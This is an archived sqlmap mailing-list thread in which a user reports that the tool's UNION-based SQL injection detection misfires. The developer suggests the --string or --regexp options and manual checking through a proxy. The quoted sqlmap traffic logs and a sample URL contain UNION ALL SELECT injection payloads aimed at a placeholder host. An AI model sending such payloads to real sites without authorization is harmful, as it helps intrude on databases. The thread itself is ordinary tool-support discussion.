Re: [sqlmap-users] Bug with union test?
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Bug with union test?
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-05-20 09:04:16
|
UNION query SQL injection by its nature "append" your injected query output to the original SELECT statement. It might occur that this (--union-test / --union-use) change a lot the HTTP responses so sqlmap is not able to distinguish anymore if the test successes or not. This is yet another problem in the detection engine and once again, it will be fixed (hopefully) when we will rewrite from scratch the detection engine. All, in the meanwhile check yourself manually the SQL injection via browser, maybe passing via a proxy (Burp is my choice) so you can easily repeat requests, compare responses, etc. Then spot a string (or regexp) to be used afterwards in sqlmap (--string or --regexp) and, as you've seen David, this solves the problem. Bernardo On Mon, May 10, 2010 at 17:55, David Guimaraes <sk...@gm...> wrote: > Hmm.. seems to work through --string parameter... > > So I have to pass the --string parameter whenever I use the union > technique to sqlmap identify it correctly!?! > > > On Mon, May 10, 2010 at 11:09 AM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> For me it works with no problems against SQL injection on SELECT with >> more than a column. >> Try to provide sqlmap with --string or --regex. Also, try with >> --union-tech orderby. >> >> Bernardo >> >> >> On Sun, May 9, 2010 at 21:33, David Guimaraes <sk...@gm...> wrote: >>> I noticed that this is already happening for some time ago, sqlmap >>> fails to properly detect UNION inband sql injection .. even in cases >>> where the detection is quite simple as shown below: >>> >>> http://www.vulnsite.com/vulnscript.php?id=42 and 1 = 0 union all >>> select 1,2,3,4,5,6 (mysql) >>> >>> I am currently editing the sessions file directly to use the UNION >>> technique with sqlmap. >>> >>> By using the --union-test and verbose level 2, it was possible to >>> identify that sqlmap not completely test the technique of NULL >>> bruteforcing UNION. It tests only a single column, and reports that >>> have found the flaw.. as show below: >>> >>> 16:58:09] [INFO] testing inband sql injection on parameter 'id' with >>> NULL bruteforcing technique >>> [16:58:09] [TRAFFIC OUT] HTTP request: >>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%203967=3967 >>> HTTP/1.1 >>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >>> Host: www.vulnsite.com >>> Accept-language: en-us,en;q=0.5 >>> Cookie: >>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >>> Connection: close >>> >>> [16:58:10] [INFO] confirming full inband sql injection on parameter 'id' >>> [16:58:10] [TRAFFIC OUT] HTTP request: >>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204073=4073 >>> HTTP/1.1 >>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >>> Host: www.vulnsite.com >>> Accept-language: en-us,en;q=0.5 >>> Cookie: >>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >>> Connection: close >>> >>> [16:58:10] [WARNING] the target url is not affected by an exploitable >>> full inband sql injection vulnerability >>> [16:58:10] [INFO] confirming partial (single entry) inband sql >>> injection on parameter 'id' by appending a false condition after the >>> parameter value >>> [16:58:11] [TRAFFIC OUT] HTTP request: >>> GET /vulnscript.php?id=42%20AND%206261=6262%20UNION%20ALL%20SELECT%20NULL%23%20AND%206194=6194 >>> HTTP/1.1 >>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >>> Host: www.vulnsite.com >>> Accept-language: en-us,en;q=0.5 >>> Cookie: >>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >>> Connection: close >>> >>> [16:58:11] [WARNING] the target url is not affected by an exploitable >>> partial (single entry) inband sql injection vulnerability >>> [16:58:11] [INFO] confirming partial (single entry) inband sql >>> injection on parameter 'id' with negative parameter value >>> [16:58:11] [TRAFFIC OUT] HTTP request: >>> GET /vulnscript.php?id=-42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204970=4970 >>> HTTP/1.1 >>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >>> Host: www.vulnsite.com >>> Accept-language: en-us,en;q=0.5 >>> Cookie: >>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >>> Connection: close >>> >>> [16:58:12] [WARNING] the target url is not affected by an exploitable >>> partial (single entry) inband sql injection vulnerability >>> valid union: None >>> >>> Sqlmap documentation says: "By default sqlmap uses the NULL >>> bruteforcing technique to detect the number of columns within the >>> original SELECT statement." >>> >>> I think the correct use of brute force technique would be to test >>> several columns until find the correct number. Right? >>> >>> -- >>> David Gomes Guimarães >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: 0x05F5A30F >> > > > > -- > David Gomes Guimarães > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
